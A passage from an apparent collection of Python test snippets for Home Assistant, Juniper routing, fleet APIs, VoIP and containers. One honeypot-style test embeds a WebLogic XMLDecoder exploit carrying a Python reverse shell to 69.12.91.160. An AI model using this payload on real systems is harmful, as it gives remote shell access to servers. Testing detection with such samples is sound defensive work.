}\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n 
params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_rpcCall(self):\n pass", "def setUp(self):\n self.hass = get_test_home_assistant()\n mock_component(self.hass, 'group')\n assert setup_component(self.hass, zone.DOMAIN, {\n 'zone': {\n 'name': 'test',\n 'latitude': 32.880837,\n 'longitude': -117.237561,\n 'radius': 250,\n }\n })\n\n self.calls = []\n\n @callback\n def record_call(service):\n \"\"\"Record calls.\"\"\"\n self.calls.append(service)\n\n self.hass.services.register('test', 'automation', record_call)", "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)", "async def test_services(hass, coap_wrapper):\n assert coap_wrapper\n\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(coap_wrapper.entry, SWITCH_DOMAIN)\n )\n await hass.async_block_till_done()\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_ON,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_ON\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_OFF,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_OFF", "def run(self):\r\n logging.info(\"Now excecuting test step {}\".format(self.stepname))\r\n try:\r\n response = eval(\"requests.{}('{}',params={})\".format(self.verb, self.url, self.payload))\r\n return response, True\r\n\r\n except requests.exceptions.RequestException as e:\r\n logging.warn(\"test {} failed\".format(self.stepname))\r\n \r\n return None, False", "def setUp(self):\n self.tool = flow_common_tool()\n self.xml = xml_tool()\n self.ins = route()\n\n self.response = {}\n self.response[\"HA_SINGLE_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_MULTI_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n 
<instance-name>__juniper_private1__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private1__.inet.0</irib-name>\n <irib-active-count>12</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private2__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private2__.inet.0</irib-name>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>1</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private3__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private4__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private4__.inet.0</irib-name>\n <irib-active-count>2</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__master.anon__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>mgmt_junos</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n </instance-information>\n \"\"\"\n\n\n self.response[\"HA_SINGLE_INSTANCE_BRIEF\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_DETAIL\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>18</irib-route-count>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>1</irib-route-count>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>20</irib-route-count>\n 
<irib-active-count>20</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>iso.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>__mpls-oam__.mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>5</irib-route-count>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2circuit.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mdt.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2protection.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>lsdist.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n 
</instance-rib>\n <instance-rib>\n <irib-name>lsdist.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inetcolor.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6color.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"SA_INSTANCE_TEXT\"] = \"\"\"\nInstance Type\n Primary RIB Active/holddown/hidden\nmaster forwarding\n inet.0 18/0/0\n\n__juniper_private1__ forwarding\n __juniper_private1__.inet.0 6/0/0\n\n__juniper_private2__ forwarding\n __juniper_private2__.inet.0 0/0/1\n\n__juniper_private3__ forwarding\n\n__juniper_private4__ forwarding\n __juniper_private4__.inet.0 2/0/0\n\n__master.anon__ forwarding\n \"\"\"", "def test(self):\n exploit = \"\"\"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>/bin/sh</string>\n </void>\n <void index=\"1\">\n <string>-c</string>\n </void>\n <void index=\"2\">\n <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.c\"\"\" \\\n \"\"\"onnect((\"69.12.91.160\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=\"\"\" \\\n \"\"\"subprocess.call([\"/bin/sh\",\"-i\"]);'</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\"\"\"\n requests.post(\"http://127.0.0.1:{}/wls-wsat/CoordinatorPortType\".format(WEBLOGIC_PORT), data=exploit)\n\n return [WEBLOGIC_ALERT_TYPE_NAME]", "async def test_get_fleet_maintenance_list(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/maintenance/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> 
None:\n test_value = []\n\n @ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1", "async def test_api_call_service_bad_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\n \"test_domain\", \"test_service\", listener, schema=vol.Schema({\"hello\": str})\n )\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"hello\": 5}\n )\n assert resp.status == HTTPStatus.BAD_REQUEST", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "async def test_service_refresh_devices_trigger_no_state_update(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n data = {\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n }\n }\n with patch.dict(DECONZ_WEB_REQUEST, data):\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 1\n\n captured_events = async_capture_events(hass, CONF_DECONZ_EVENT)\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5\n assert len(captured_events) == 0", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n\n config_filename = 'testsuite_cfg.json'\n args.config = config_filename\n config_file = open(config_filename, 'w')\n config_file.write(str(json.dumps(config)))\n config_file.close()\n\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app1', 'epg1')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app2', 'epg2')\n mac3 = '00:11:22:33:33:36'\n ip3 = '3.4.3.7'\n self.add_endpoint(mac3, ip3, 
'intersite-testsuite', 'app2', 'epg2')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app1-epg1'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app2-epg2'))\n self.assertTrue(self.verify_remote_site_has_entry(mac3, ip3, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app2-epg2'))", "def test_build_payload(self):\n pytrend = TrendReq()\n pytrend.build_payload(kw_list=['pizza', 'bagel'])\n self.assertIsNotNone(pytrend.token_payload)", "def test_container_cycle(self):\n # Before Create\n print(\"Create\")\n rep = post(self.url + \"/search\", data={'name': name})\n self.errorCatch(rep)\n\n # Create\n rep = post(self.url + \"/create\", data={\n 'image': default_image,\n 'homepath': \"/nashome/guest/test\",\n 'naspath': \"/home/nas/test\",\n 'command': \"tail -f /dev/null\",\n 'name': name})\n self.checkRunning()\n\n # Double create\n rep = post(self.url + \"/create\", data={\n 'image': default_image,\n 'homepath': \"/nashome/guest/test\",\n 'naspath': \"/home/nas/test\",\n 'command': \"tail -f /dev/null\",\n 'name': name})\n self.errorCatch(rep)\n\n # Check by api\n con = client.containers.get(name)\n self.assertIn(\"tmp0\", con.exec_run(\"ls /home/nas\").output.decode())\n self.assertIn(\"tmp1\", con.exec_run(\"ls /home/ubuntu\").output.decode())\n self.assertEqual(con.status, \"running\")\n\n # Stop\n con.exec_run(\"touch /opt/tmp2\").output.decode()\n print(\"Stop\")\n rep = post(self.url + \"/stop\", data={'name': name})\n self.checkOK(rep)\n\n # check stop\n rep = post(self.url + \"/search\", data={'name': name})\n self.checkOK(rep)\n rep = rep.json()\n self.assertIsInstance(rep[\"data\"], dict)\n self.assertEqual(rep['data']['status'], \"exited\")\n\n # start\n print(\"Resume\")\n rep = post(self.url + \"/start\", data={'name': name})\n self.checkOK(rep)\n self.checkRunning()\n con = client.containers.get(name)\n self.assertIn(\"tmp2\", con.exec_run(\"ls /opt\").output.decode())\n\n # change pw\n print(\"Change Password\")\n con.exec_run(\"adduser ubuntu\")\n rep = post(self.url + \"/passwd\", data={'name': name,\n 'pw': \"tmpPW\"})\n self.checkOK(rep)\n self.assertIn(\"tmpPW\", con.exec_run(\"cat /etc/shadow\").output.decode())\n\n # commit\n print(\"Commit\")\n rep = post(self.url + \"/commit\", data={'name': name,\n 'newname': name})\n self.checkOK(rep)\n\n # search image\n rep = post(self.url + \"/search/image\", data={'name': name})\n rep = rep.json()\n self.assertIsInstance(rep['data'], dict)\n\n # delete\n print(\"Delete\")\n rep = post(self.url + \"/delete\", data={'name': name})\n self.checkOK(rep)\n\n # check delete\n rep = post(self.url + \"/search\", data={'name': name})\n self.errorCatch(rep)\n\n # Delete Image\n print(\"Delete Image\")\n rep = post(self.url + \"/delete/image\", data={'name': name})\n self.checkOK(rep)\n\n # Check if delete it\n rep = post(self.url + \"/search/image\", data={'name': name})\n self.errorCatch(rep)", "def test_turnon(\n fauxmo_server: pytest.fixture, simplehttpplugin_target: pytest.fixture\n) -> None:\n data = (\n b'SOAPACTION: \"urn:Belkin:service:basicevent:1#SetBinaryState\"'\n b\"<BinaryState>1</BinaryState>\"\n )\n\n resp = requests.post(\n \"http://127.0.0.1:12345/upnp/control/basicevent1\", data=data\n )\n assert resp.status_code == 200", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 
'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_fax_inbound_automation_post(self):\n pass", "def invoke():\n # CONFIG: Read configuration information\n config = conf.get_yaml_field(gl.configFile)\n dd_enable = config['ENABLE_DDING']\n dd_token = config['DD_TOKEN']\n dd_url = config['DING_URL']\n email_enable = config['EMAIL_ENABLE']\n # END CONFIG.\n\n # Test report file name.\n time_str = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n path = RunTestCase.create_report_file()\n\n # Start test the send pin message.\n if dd_enable:\n scripts.send_msg_dding(\n '{}:★开始API接口自动化测试★'.format(time_str),\n dd_token,\n dd_url\n )\n\n # Execute the test and send the test report.\n RunTestCase.run(path)\n if dd_enable:\n # Template message.\n dir_list = path.split('\\\\')\n low_path = dir_list[len(dir_list) - 2]\n msg = RunTestCase.tmpl_msg(low_path)\n print(msg)\n scripts.send_msg_dding(msg, dd_token, dd_url)\n\n if email_enable:\n # Send test report to EMAIL.\n email = EmailClass()\n email.send(path)", "def test_get_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"Get master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, name=\"master\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n\n print(\"Get all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_MULTI_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 8)\n self.assertEqual(int(response[5][\"instance_rib_irib_active_count\"]), 2)\n\n print(\"Get brief all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_BRIEF\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(int(response[0][\"instance_rib_irib_active_count\"]), 18)\n\n print(\"Get detail all instance info from HA topo\")\n 
mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_DETAIL\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(response[0][\"router_id\"], \"10.208.133.147\")\n\n print(\"Get extensive all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 18)\n self.assertEqual(response[17][\"instance_rib_irib_name\"], \"inet6color.0\")\n\n print(\"Get summary all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertGreaterEqual(len(response), 1)\n\n print(\"Get route instance info by text and more options\")\n mock_execute_cli_command_on_device.return_value = self.response[\"SA_INSTANCE_TEXT\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, return_mode=\"text\", more_options=\"summary\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, str)\n self.assertRegex(response, r\"__juniper_private1__.inet.0\")\n\n print(\"Invalid return_mode value\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n self.assertRaisesRegex(\n ValueError,\n r\"'return_mode' must be 'ENTRY_LIST' or 'TEXT'\",\n self.ins.get_route_instance_entry,\n device=mock_device_ins, return_mode=\"Unknown\",\n )\n\n print(\"Cannot get response from device\")\n mock_execute_cli_command_on_device.return_value = False\n response = self.ins.get_route_instance_entry(device=mock_device_ins, more_options=\"summary\")\n self.assertFalse(response)", "def test_run(self) -> None:\n startDate = dt.datetime.now() - dt.timedelta(days=1)\n endDate = startDate\n\n rawFreqCreator = RawFrequencyCreationHandler(\n self.appConfig['rawFrequencyCreationServiceUrl'])\n resp = rawFreqCreator.createRawFrequency(startDate, endDate)\n self.assertTrue(resp['isSuccess'])\n self.assertTrue(resp['status'] == 200)\n self.assertTrue('message' in resp)", "def run(self,base_url):\n\n url = base_url + self.endpoint\n\n if self.method.upper() == \"GET\":\n r = requests.get(url)\n\n elif self.method.upper() == \"POST\":\n\n if self.payload is not None:\n r = requests.post(url, json=self.payload)\n else:\n r = requests.post(url)\n\n else:\n msg = \"Malformed test. 
Allowed methods are GET and POST\"\n return get_failure_object(msg)\n\n try:\n\n resp = r.json()\n\n except ValueError as e:\n\n msg = \"Could not decode JSON from response.\"\n return get_failure_object(msg)\n\n try:\n\n # Run all checks for expected exact JSON response values\n for check_key in self.expected_values:\n\n exp_val = self.expected_values[check_key]\n\n if exp_val != resp[check_key]:\n\n msg = \"Expected value '%s' at key '%s' but got '%s'.\" \\\n % (str(exp_val), str(check_key), str(resp[check_key]))\n\n return get_failure_object(msg)\n\n # Run all checks for expected types in JSON response\n for check_key in self.expected_types:\n\n exp_type = self.expected_types[check_key]\n val = resp[check_key]\n\n if exp_type == \"string\":\n type_res = test_expected_type(val, str)\n\n elif exp_type == \"int\":\n type_res = test_expected_type(val, int)\n\n elif exp_type == \"float\":\n type_res = test_expected_type(val, float)\n\n else:\n msg = \"Malformed test. Expected types allowed: 'str',\\\n 'int', 'float'\"\n return {\"status\": \"FAILED\", \"error_msg\": msg}\n\n if type_res == False:\n msg = get_expected_type_error_message(check_key, val, exp_type)\n return get_failure_object(msg)\n\n return {\"status\":\"PASSED\"}\n\n except KeyError as e:\n msg = \"Expected key '%s' not found.\" % str(e.args[0])\n return get_failure_object(msg)", "def setUp(self):\n super(TestSyncServiceRisk, self).setUp()\n self.api = ExternalApiClient()", "def test_for_client():", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def test_api_new_game(self):\n\n with self.client as client:\n ...\n # write a test for this route", "async def test_18() -> None:\n LOG.debug(\"Test post query (end < start)\")\n payload = {\n \"referenceName\": \"MT\",\n \"start\": 9,\n \"end\": 8,\n \"referenceBases\": 